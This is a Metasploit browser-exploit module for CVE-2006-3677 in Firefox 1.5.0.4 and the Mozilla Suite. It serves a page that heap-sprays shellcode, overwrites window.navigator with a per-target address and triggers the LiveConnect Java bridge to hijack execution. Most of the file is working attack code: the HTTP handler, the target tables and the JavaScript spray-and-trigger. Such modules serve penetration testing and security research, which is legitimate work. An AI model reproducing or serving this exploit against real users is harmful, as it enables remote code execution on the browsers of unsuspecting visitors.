##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
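# Browser exploit for CVE-2006-3677 (MFSA 2006-45).
#
# The served page heap-sprays a per-target fill word interleaved with the
# payload, overwrites `window.navigator` with a number derived from the
# target's 'Ret' value, and then touches the LiveConnect `java.*` bridge so
# the browser dereferences the sprayed data. The Java plugin (LiveConnect)
# must be present on the victim for the trigger to do anything.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  # BrowserAutopwn registration, disabled upstream; kept for reference.
  # include Msf::Exploit::Remote::BrowserAutopwn
  # autopwn_info({
  #   :ua_name => HttpClients::FF,
  #   :ua_minver => "1.5.0",
  #   :ua_maxver => "1.5.1",
  #   :javascript => true,
  #   :rank => NormalRanking, # reliable memory corruption
  #   :vuln_test => %Q|
  #     is_vuln = false;
  #     if (navigator.javaEnabled()){
  #       is_vuln = true;
  #     }
  #   |,
  # })

  # Module metadata. Each target carries its platform/arch plus the two
  # spray parameters consumed by generate_html: 'Ret', the value written over
  # window.navigator (halved in the page), and 'Fill', the %u-escaped 16-bit
  # word used to pad the heap spray. 'Space' caps the payload at 512 bytes.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Mozilla Suite/Firefox Navigator Object Code Execution',
        'Description' => %q{
          This module exploits a code execution vulnerability in the Mozilla
          Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit
          requires the Java plugin to be installed.
        },
        'License' => MSF_LICENSE,
        'Author' => ['hdm'],
        'References' => [
          ['CVE', '2006-3677'],
          ['OSVDB', '27559'],
          ['BID', '19192'],
          ['URL', 'http://www.mozilla.org/security/announce/mfsa2006-45.html']
        ],
        'Payload' => {
          'Space' => 512,
          'BadChars' => "",
        },
        'Platform' => %w{win linux osx},
        'Targets' => [
          [
            'Firefox 1.5.0.4 Windows x86',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
              'Ret' => 0x08000800,
              'Fill' => "%u0800",
            }
          ],
          [
            'Firefox 1.5.0.4 Linux x86',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
              'Ret' => -0x58000000,
              'Fill' => "%ua8a8",
            }
          ],
          [
            'Firefox 1.5.0.4 Mac OS X PPC',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_PPC,
              'Ret' => 0x0c000000,
              'Fill' => "%u0c0c",
            }
          ],
          [
            'Firefox 1.5.0.4 Mac OS X x86',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
              'Ret' => 0x1c000000,
              'Fill' => "%u1c1c",
            }
          ],
        ],
        'DisclosureDate' => '2006-07-25',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # HTTP request handler: serve the exploit page to the connecting client,
  # then hand the connection to the payload handler.
  #
  # @param cli [Rex::Socket::Tcp] connected client (framework type)
  # @param request [Rex::Proto::Http::Request] the request; not inspected,
  #   every URI under the server root receives the same page
  # @return [void]
  def on_request_uri(cli, request)
    # Regenerate the payload per client so each visitor gets its own
    # encoded copy; bail out silently if generation fails.
    pload = regenerate_payload(cli)
    return unless pload

    print_status("Sending #{self.name}")
    send_response_html(cli, generate_html(pload), { 'Content-Type' => 'text/html' })

    # Handle the payload
    handler(cli)
  end

  # Build the exploit page for the selected target.
  #
  # @param payload [Object] payload instance whose #encoded bytes are embedded
  # @return [String] HTML document whose onload handler runs the spray/trigger
  def generate_html(payload)
    # %uXXXX-escape the encoded payload so JavaScript unescape() rebuilds it
    # as a UTF-16 string in the target architecture's byte order.
    enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

    # The page is kept verbatim; its constants are tuned per target:
    #  * the fill string is doubled until it exceeds 0x400000 characters;
    #  * 36 strings of 4 x 0x100000 characters are built, each a fill block
    #    followed by the shellcode repeated four times, so the payload recurs
    #    at regular offsets throughout the spray;
    #  * window.navigator is overwritten with Ret / 2 (the halving presumably
    #    accounts for the JS engine's value representation -- not confirmed
    #    here) and the LiveConnect lookup that dereferences it is triggered,
    #    with any exception swallowed so the page does not error out.
    # NOTE(review): `if (window.navigator.javaEnabled)` tests that the
    # property exists rather than calling javaEnabled(); the disabled autopwn
    # check above calls it. Left as-is since changing it would alter the
    # exploit's original behaviour.
    return %Q|
      <html><head>
      <script>
      function Exploit() {
        if (window.navigator.javaEnabled) {
          var shellcode = unescape("#{enc_code}");
          var b = unescape("#{target['Fill']}");
          while (b.length <= 0x400000) b+=b;

          var c = new Array();
          for (var i =0; i<36; i++) {
            c[i] =
              b.substring(0, 0x100000 - shellcode.length) + shellcode +
              b.substring(0, 0x100000 - shellcode.length) + shellcode +
              b.substring(0, 0x100000 - shellcode.length) + shellcode +
              b.substring(0, 0x100000 - shellcode.length) + shellcode;
          }

          window.navigator = (#{target['Ret']} / 2);
          try {
            java.lang.reflect.Runtime.newInstance(
              java.lang.Class.forName("java.lang.Runtime"), 0
            );
          }catch(e){

          }
        }
      }
      </script>
      </head><body onload='Exploit()'>Please wait...</body></html>
    |
  end
end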